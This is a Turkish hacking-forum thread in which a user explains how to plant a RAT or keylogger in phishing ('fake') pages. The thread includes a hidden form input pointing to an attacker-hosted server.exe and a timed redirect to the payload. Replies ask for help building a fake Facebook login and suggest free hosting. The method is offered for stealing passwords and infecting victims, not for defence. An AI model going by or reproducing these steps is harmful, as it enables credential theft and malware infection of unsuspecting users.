Fakelerinize Logger - Rat Yerleştirin

evillord

Uzman üye
7 Tem 2009
1,558
0
Kod aklın di
Yine Farklı Bir Yöntemle Karşınızdayım .

1-Fake sayfalarınıza Logger-Rat yerleştirmek için Free hostunuza Server.exe’yi upload ettikten sonra

<input type="hidden" name="url" value="http://www.siteniz.freehost.com/server.exe"> olarak değiştirin.

Kurban Giriş Yap’Butonuna tıkladığında Girilen şifre Mail hesabınıza gelir ve + Server.exe’yi Çalıştırmasını sağlarız ve server’ı çalıştırdığı zaman Log almaya başlayabilirsinz.

2-Herhangi bir sayfanın fakesini yaptığınızı ve loggerınızı upload ettiğinizi farz ederek anlatıyım...
Örn:www.site.com fakesini yaptınız login giriş yeri yok..
bu sayfada sadece Server yedirebilirsiniz..
Fake sayfanıza alttaki yazmış olduğum kodu ekleyerek belirli bi saniye sonra server’ınıza yönlendirirsiniz.

1g4ri0.jpg

Saniyeyi değiştirmek için content="5 kısmını değiştirin...

Not:Benim çok sıklıkla kullandığım bi yöntem..Ben bunu yöntem Olarak görüyorum Basit bi kod parçası olarak değil...

Son düzenleme:

hexenmeistercoder

Yeni üye
27 Eyl 2011
1
0
Sagolasın eger calısırsa gercekten cok buyuk bır sey bu :D Ben fake facebook yapıyordum sıte sıfreler de gelıyordu ama suan nedense olmuyor beceremıyorum login kısmı var da giris yapa basınca sifreler gelmiyor formbuddyme. neyse logine gerek yok demistin di mi ? site kursam fake sadece goruntu olcak bunu yapıstırsam altına 5sn bekledı mı benım sıtemde karsı pcye rat gırecek ve bu logları formbuddyme mi mailime mi gonderecek birazcık daha acar mısın konuyu ? dıyelım kı benım sıtem deneme123.tr.gg siteniz.freehostunuz yazmıycam dı mı html kod kısmına ? sitenize deneme123 freehostunuza da tr.gg yazıcam ?

Gercekten hazır boyle bılgılı bırını bulmusken faydalanmalıyım rıca etsem anlatır mısın bu dedıklerıme gore konuyu aca aca :)

HaCker DeSire

Kıdemli Üye
8 Ağu 2011
3,257
2
İstanbul
o Zaman com.nu nun yanına .tk alsın. Beleşe bedaca hostlardan alsın. Kulansın :)

com.nu site açtım 1000 onlineyi geçince puff ediyor :)

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.